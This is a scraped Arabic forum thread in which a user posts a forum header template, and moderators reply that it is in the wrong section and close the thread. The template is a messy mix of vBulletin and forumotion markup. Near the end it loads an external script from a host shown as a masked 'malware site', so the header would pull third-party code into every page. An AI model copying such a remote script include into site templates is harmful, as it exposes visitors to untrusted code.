no-repeat;background-position: right 10px;border: 1px solid #203FAA;padding: 15px 65px 10px 5px;display: block;}.saleh-caution {font-family: Arial;font-size: 12px;font-weight: bold;color: #000000;background-image: url('http://shgap.com/vb/images/toolbox/caution.png');background-repeat: no-repeat;background-color: #FFFFCC;background-position: right 10px;border: 1px solid #990000;padding: 15px 65px 10px 5px;}.saleh-warning {font-family: Arial;font-size: 12px;font-weight: bold;color: #000000;background-image: url('http://shgap.com/vb/images/toolbox/warning.png');background-color: #FFCCCC;background-repeat: no-repeat;background-position: right 10px;border: 1px solid #FF0000;padding: 15px 65px 10px 5px;}.shakeimage{position:relative}P {FONT: 11px tahoma}A:link {COLOR: #5e4a31; TEXT-DECORATION: none}</style><link href="clientscript/vbulletin_important.css?v=384" type="text/css" rel="stylesheet"><!--
 / CSS Stylesheet --><script src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=384" type="text/javascript"></script><script src="clientscript/yui/connection/connection-min.js?v=384" type="text/javascript"></script><script type="text/javascript">&lt;!--
var SESSIONURL = "";var SECURITYTOKEN = "guest";var IMGDIR_MISC = "ramadan2/misc";var vb_disable_ajax = parseInt("1", 10);// --&gt;</script><script src="clientscript/vbulletin_global.js?v=384" type="text/javascript"></script><script src="clientscript/vbulletin_menu.js?v=384" type="text/javascript"></script><!--
 الرجاء ثم الرجاء ثم الرجاء عدم التعديل على الهاك او الاقتباس منه ولانسمح بذلك كليا اخوكم ابو عمر --><title> مجتمع فلسفة مزاج - تويكس®</title><div class="container"><div class="s-d_02"><div class="s-d_03"></div><div class="s-d_01"></div><div class="s-d_011"><a target="_blank" title="Tumblr" href="/" class="a1"></a><a target="_blank" title="Twitter" href="/" class="a2"></a><a target="_blank" title="Flickr" href="/" class="a3"></a><a target="_blank" title="Sha3r" href="/" class="a4"></a><a target="_blank" title="BlackBerry" href="/" class="a0"></a><a target="_blank" title="أذكاريّ" href="http://www.azkary.com/" class="a6"></a><a target="_blank" title="قرآن ربيّ" href="http://www.tvquran.com/" class="a7"></a></div></div><div class="content-left"><div class="content-right"> <div class="content"><!--
 content table --><!--
 open content container --><div align="center"><div style="width:100%; text-align:right" class="page"><div align="right" style="padding:0px 25px 0px 25px"><br>  <br><!--
 breadcrumb, login, pm info --><!--
 بداية الناف بار الاضافي العنكبوت --><div style="padding:1px;  border-top-width:0px" class="tborder"><table width="100%" cellspacing="0" cellpadding="0" border="0" align="center"><tbody><tr align="center"><td width="216" class="vbmenu_control"><a href="http://www.tvquran.com/"><span style="font-weight:700">طهّر مسَامعك ۞</span></a></td><td width="196" class="vbmenu_control"><a href="http://www.azkary.com/"><span style="font-weight:700">الذّكر الحكيم</span></a></td><td width="196" class="vbmenu_control"><b><a href="http://www.gulfup.com/"><span style="font-weight:700"><font color="#669999">♦ مركز التحميل ♦</font></span></a></b></td><td width="203" class="vbmenu_control"><a href="قريبا"><span style="font-weight:700">خلفيةةَ المواضيعْ ’</span></a></td><td width="162" class="vbmenu_control"><a href="http://iraq7.all-up.com/forum"><span style="font-weight:700">ツ يَ رزآقَ يَ كريم </span></a></td></tr></tbody></table></div><!--
   </td>
<!-- / CSS Stylesheet -->
<script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387"></script>
<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=387"></script>

<script type="text/javascript">
<!--
var SESSIONURL = "s=2de7b7d47e5645d7b8835476945bf44f&";
var SECURITYTOKEN = "guest";
var IMGDIR_MISC = "Free/misc";
var vb_disable_ajax = parseInt("0", 10);
// -->
</script>
<script type="text/javascript" src="clientscript/vbulletin_global.js?v=387"></script>
<script type="text/javascript" src="clientscript/vbulletin_menu.js?v=387"></script>

  </head>
  <body>
<div id="centent">
 <div class="header_t">
  <div class="header_r"></div>
  <div class="header_l">
  
 
   <a class="r-1" href="/" title="الرئيسيه" target="_blank"></a>
    <a class="r-2" href="register" title="التسجيل" target="_blank"></a>
    <a class="r-3" href="profile?mode=editprofile" title="لوحه التحكم" target="_blank"></a> </div> </div>

 <div class="colright">
    <div class="colleft">
      <div id="inside">
       <div align="center">
          <div class="page" style="width:100%; text-align:right">
            <div style="padding:0px 25px 0px 25px" align="right"> <br />
           

   </marquee></div>
</div>
</div>
</div>


<div align="center">
    <div class="page" style="width:100%; text-align:right">
        <div style="padding:0px 15px 0px 15px" align="right">


<br />
<table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
    <td class="alt1" width="100%">
      
<div class="navbar" style="font-size:9pt"><a href="index.php" accesskey="1"><img class="inlineimg" src="http://illiweb.com/fa/empty.gif" alt="" border="0" /></a> <strong>
    <a class="nav" href="{U_INDEX}">
        <div class="nav"><img src="http://lo0g.com/vb/3idfree/misc/navbits_start.gif" class="inlineimg" alt="" border="0" height="" width="" /> {L_INDEX} </a>{NAV_CAT_DESC}</div>
                <font face="Tahoma"><span style="font-size: 9pt"<font-weight="bold"><img src="http://lo0g.com/vb/3idfree/misc/navbits_finallink_rtl.gif" height="" width="" /><font size="2"><strong>{PAGE_TITLE}</strong></font></span></font>
            </strong></div>
      
  
      
   </td>

    <td class="alt2" nowrap="nowrap" style="padding:0px">
        <!-- BEGIN switch_user_logged_out -->
<form action="/login.forum?redirect=h15-page" method="post" name="form_login">
        <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=386"></script>
        <table cellpadding="0" cellspacing="3" border="0">
        <tr>
            <td class="smallfont" style="white-space: nowrap;"><label for="navbar_username">اسم العضو</label></td>

            <td><input type="text" class="bginput" style="font-size: 11px" name="username" id="Post" size="9" accesskey="u" tabindex="101" value="" onfocus="if (this.value == 'اسم العضو') this.value = '';" /></td>
            <td class="smallfont" nowrap="nowrap"><label for="cb_cookieuser_navbar"><input type="checkbox" name="autologin" value="1" tabindex="103" id="Post" accesskey="c" />حفظ البيانات؟</label></td>
        </tr>
        <tr>
            <td class="smallfont"><label for="navbar_password">كلمة المرور</label></td>
            <td><input type="password" class="bginput" style="font-size: 11px" name="password" id="Post"size="9" tabindex="102" /></td>
            <td><input type="submit" name="login" class="button" value="سجل الدخول" tabindex="104" title="ادخل اسم العضو وكلمة المورور." accesskey="s" /></td>
        </tr>

        </table>
        <input type="hidden" name="s" value="94ca5d1ad1eec92fb211ce73d5b364b5" />
        <input type="hidden" name="securitytoken" value="guest" />
        <input type="hidden" name="do" value="login" />
        <input type="hidden" name="vb_login_md5password" />
        <input type="hidden" name="vb_login_md5password_utf" />
        </form>
        
<!-- END switch_user_logged_out -->

    <!-- BEGIN switch_user_logged_in -->

              <strong>{LOGGED_AS}</strong><br />

  <span class="time">{CURRENT_TIME}</span>
 
 <div><span id="notifications"> <strong>{LAST_VISIT_DATE}</strong></span></div>
    <!-- END switch_user_logged_in -->
    </td>

</tr>
</table>
<!-- / breadcrumb, login, pm info -->

<!-- nav buttons bar -->
<div class="tborder" style="padding:1px; border-top-width:0px">
    <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
    <tr align="center">
      
     
         <!-- BEGIN switch_user_logged_out -->
                  <td class="vbmenu_control"><a href="/register" rel="nofollow">التسجيل</a></td>
      
      
          <td class="vbmenu_control"><a rel="help" href="/faq" accesskey="5">التعليمات</a></td>
      
          
      
          
              
                <td class="vbmenu_control"><a href="/search?search_id=newposts" accesskey="2">مشاركات اليوم</a></td>
              
          <td class="vbmenu_control"><a id="navbar_search" href="/search" accesskey="4" rel="nofollow">البحث</a> </td>
          
          
          
<!-- END switch_user_logged_out -->


    <!-- BEGIN switch_user_logged_in -->
          
          
        
            <td class="vbmenu_control"><a href="/profile?mode=editprofile">.. ، آنٍآ فُقطِ / ♥</a></td>
      

               <td class="vbmenu_control"><a href="/memberlist" accesskey="5">الأعضآء</a></td>

              
                <td class="vbmenu_control"><a href="/search?search_id=newposts" accesskey="2">المشارڪات الجديدهہ</a></td>
              
          <td class="vbmenu_control"><a id="navbar_search" href="/search" accesskey="4" rel="nofollow">البحثّ</a> <script type="text/javascript"> vbmenu_register("navbar_search"); </script></td>
          
          
                <td class="vbmenu_control"><a href="/privmsg" rel="nofollow" accesskey="9">مشآركاتي</a><script type="text/javascript"> vbmenu_register("usercptools"); </script></td>

          
      
      
      
            <td class="vbmenu_control"><a href="login?logout=true" onclick="return log_out('هل أنت متأكد برغبتك في الخروج من المنتدى؟')">، بـّ هُدؤوءِ♥' ♥</a></td>
 
     
          
          
            <!-- END switch_user_logged_in -->
      
     
     
       </tr>
    </table>
</div>


    <!-- BEGIN switch_user_logged_out -->

<!-- guest welcome message -->
<table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
    <td class="tcat">{L_INDEX} ».</td>
</tr>
<tr>
  
</tr>
</table>
<!-- / guest welcome message -->

            
<!-- END switch_user_logged_out -->
<script type="text/javascript"><!--
zone = "46";
pl = "20031";
url = "http://---malwar_site---";
//--></script>
<script type="text/javascript" src="http://---malwar_site---/ad4arb.js"></script>

avatar
irak
عضو مبتدء في الاشهار

البلد : المغرب العربي
الجنس : ذكر
عدد المساهمات : 64
نقاط النشاط : 108

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: overall_header قنبلة الموسم

مُساهمة من طرف irak في السبت أبريل 19, 2014 3:09 pm


همسة ارجو وضع كلمة شكر @@

avatar
irak
عضو مبتدء في الاشهار

البلد : المغرب العربي
الجنس : ذكر
عدد المساهمات : 64
نقاط النشاط : 108

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: overall_header قنبلة الموسم

مُساهمة من طرف OuSsaMa BeDdAi في الخميس مايو 22, 2014 12:53 am


اخي الكريم ليس القسم 


المناسب هاذا قسم الاسئلة مو اكواد تومبيلات 

ارجو قفل الموضوع   
التوقيع


يا رب ان كان هناك حاسدا يكره أن يرانى سعيدا فأرزقه سعادة تنسيه أمر سعادتى 
gg444g gg444g
avatar
OuSsaMa BeDdAi
إشهاري خبير 90%

البلد : الجزائر
الجنس : ذكر
عدد المساهمات : 7161
نقاط النشاط : 7446

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: overall_header قنبلة الموسم

مُساهمة من طرف 2Boos Ro7K في الخميس يوليو 24, 2014 2:16 pm


هذا القسم للدعم لاكواد التومبلايت وليس لوضع اكواد تومبلايت عادية
التوقيع
<<<<لشكوى الاعضاء ضد الفريق الخاص>>>>
رابط منتداي #!

http://www.star-style1.com


  
avatar
2Boos Ro7K
إشهاري خبير 90%

البلد : فلسطين
الجنس : ذكر
عدد المساهمات : 1770
نقاط النشاط : 1954

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: overall_header قنبلة الموسم

مُساهمة من طرف Mr.ToMPleT في الخميس يوليو 24, 2014 6:23 pm


ما هذا !
لا استطيع ان اقول شرحا !
ولا استطيع ان اقوم سؤالا !
يغلق
التوقيع<<<<لشكوى الاعضاء ضد الفريق الخاص>>>>شكرا لك اختي سحر على التوقيع الرآئع .. gg444g 


تحذير : هناك من يقلد اسمي في المنتديات الاخرى ، ارجو عدم التعامل معهم
       فهم لا يمثلوني اطلاقا ومن يريد التواصل معي يراسلني عبر
الرسائل الخاصة وهنا في
الاشهار العربي فقط .
avatar
Mr.ToMPleT
إشهاري خبير 90%

البلد : فلسطين
الجنس : ذكر
عدد المساهمات : 17414
نقاط النشاط : 20099

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة

سجل دخولك لتستطيع الرد بالموضوع

لابد تكون لديك عضوية لتستطيع الرد سجل الان

سجل معنا الان

انضم الينا بمنتدي الابداع العربي فعملية التسجيل سهله جدا ؟


تسجيل عضوية جديدة

سجل دخولك

لديك عضوية هنا ؟ سجل دخولك من هنا .


سجل دخولك

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى